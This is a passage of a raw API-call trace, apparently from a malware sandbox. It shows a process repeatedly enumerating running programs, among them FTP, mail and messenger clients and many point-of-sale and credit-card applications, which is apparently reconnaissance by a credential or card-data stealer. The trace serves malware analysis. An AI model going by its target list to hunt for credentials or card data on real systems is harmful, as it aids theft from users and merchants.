th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0196.039] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0196.042] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0196.048] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0196.051] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0196.053] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0196.056] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0196.062] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0196.065] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0196.068] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0196.071] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0196.123] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0196.125] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0196.127] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0196.129] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0196.131] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0196.133] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0196.135] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0196.139] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0196.141] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0196.143] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0196.145] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0196.146] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0196.148] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0196.150] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0196.154] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0196.156] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0196.157] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0196.159] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0196.161] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0196.163] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0196.166] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0196.215] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0196.217] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0196.219] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0196.220] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0196.222] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0196.224] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0196.226] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xccc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x500, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0196.227] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xccc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x500, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 0 [0196.229] CloseHandle (hObject=0x228c) returned 1 [0196.229] Sleep (dwMilliseconds=0x64) [0196.356] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x228c [0196.368] Process32First (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0196.369] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0196.374] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0196.375] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0196.377] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0196.379] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0196.381] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0196.382] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0196.384] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0196.386] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.390] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.392] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0196.394] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.396] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.398] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.400] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.506] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.508] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.510] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.526] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0196.528] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0196.530] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0196.532] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.622] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0196.624] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0196.627] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0196.629] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0196.630] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0196.632] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.634] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0196.636] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0196.639] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0196.642] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0196.730] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0196.732] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0196.733] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0196.735] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0196.737] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0196.739] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0196.740] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0196.742] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0196.743] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0196.746] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0196.748] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0196.750] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, 